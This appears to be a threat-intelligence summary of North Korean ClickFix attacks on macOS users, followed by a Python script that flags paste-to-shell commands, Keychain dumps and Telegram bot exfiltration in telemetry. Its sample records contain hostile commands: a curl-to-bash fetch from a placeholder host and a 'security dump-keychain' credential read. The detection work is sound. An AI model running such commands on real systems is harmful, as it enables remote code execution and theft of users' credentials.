North Korea's Lazarus Group is deploying ClickFix social engineering attacks against macOS users, particularly targeting FinTech and cryptocurrency organizations and their leadership. Attackers contact victims via Telegram using compromised accounts, lure them into fake video calls, then trick them into running malicious commands to 'fix connection issues.' The attack chain downloads a macOS malware kit that installs a stealer called macrasv2, which harvests browser credentials, cookies, macOS Keychain data, and browser extension data before exfiltrating everything via Telegram and self-deleting. Despite the sophisticated delivery mechanism, the malware itself is poorly written with infinite loops, exposed Telegram bot tokens, and unauthenticated C2 endpoints. The primary defense recommended is user education about ClickFix techniques.
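User education is the recommended primary defense, but the chain described above also leaves telemetry a defender can match on. As an added example (not code from the article or from the researchers it summarizes), the following Python script triages constructed macOS process-execution and network records for three observable steps of that chain: a download piped into a shell from an interactive terminal, a Keychain read, and an upload to the Telegram Bot API. The event schema, the sample records, the hostnames and bot token, and the use of the `security` command as the Keychain-access indicator are all assumptions made for illustration.

```python
"""Heuristic triage of macOS telemetry for ClickFix-style activity.

Added example, not code from the article. The Event shape is a constructed
stand-in for an EDR or unified-log record; the indicators below are assumptions
derived from the attack chain as described (paste-to-shell lure, Keychain
harvest, exfiltration through the Telegram Bot API).
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record (constructed shape, not a real EDR schema)."""
    kind: str          # "exec" or "net"
    parent: str        # parent process name, e.g. "Terminal"
    cmdline: str = ""  # command line, for exec events
    url: str = ""      # destination URL, for net events


# Rule 1: download-and-pipe-to-shell, the kind of one-liner a ClickFix lure
# asks the victim to paste into Terminal to "fix connection issues".
PASTE_TO_SHELL = re.compile(
    r"(?:\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b)"                   # curl ... | sh
    r"|(?:\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b)",   # base64 -d | sh
    re.IGNORECASE,
)

# Rule 2 (assumption): Keychain reads through the `security` CLI. The article
# says Keychain data is harvested but does not state the mechanism.
KEYCHAIN_READ = re.compile(
    r"\bsecurity\s+(?:dump-keychain|find-(?:generic|internet)-password)\b"
)

# Rule 3: Telegram Bot API used as the exfiltration channel. The token in the
# URL path is captured so it can be redacted in output and reported.
TELEGRAM_BOT = re.compile(
    r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]{20,})/(sendDocument|sendMessage)"
)

# Parents from which a pasted command would be launched (assumption).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def redact_token(token: str) -> str:
    """Keep the bot id and the edges of the secret; the token is a credential."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"


def triage(events):
    """Return (event_index, rule_name, detail) for every event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        if ev.kind == "exec":
            if ev.parent in INTERACTIVE_PARENTS and PASTE_TO_SHELL.search(ev.cmdline):
                findings.append((i, "clickfix_paste_to_shell", ev.cmdline))
            if KEYCHAIN_READ.search(ev.cmdline):
                findings.append((i, "keychain_read", ev.cmdline))
        elif ev.kind == "net":
            m = TELEGRAM_BOT.search(ev.url)
            if m:
                detail = f"{m.group(2)} token={redact_token(m.group(1))}"
                findings.append((i, "telegram_bot_exfil", detail))
    return findings


# Constructed sample telemetry: three malicious records followed by two benign
# ones. Hostnames and the token are placeholders, not real indicators.
SAMPLE_EVENTS = [
    Event("exec", "Terminal",
          cmdline="curl -fsSL https://example.invalid/fix-connection.sh | bash"),
    Event("exec", "fix-connection.sh",
          cmdline="security dump-keychain -d login.keychain-db"),
    Event("net", "fix-connection.sh",
          url="https://api.telegram.org/bot123456789:AAFakeTokenForIllustrationOnly00/sendDocument"),
    Event("exec", "Terminal", cmdline="brew update"),
    Event("exec", "Terminal", cmdline="git log --oneline | head"),
]


if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Rule 1 will also fire on legitimate `curl | sh` installers typed by developers, so treat it as a scoring signal and correlate it with the later rules rather than blocking on it alone. A document upload to a Telegram bot endpoint from a freshly downloaded script is far higher signal; because the token in that URL is a credential for the attacker's bot, the script redacts it in output rather than echoing it into a ticket.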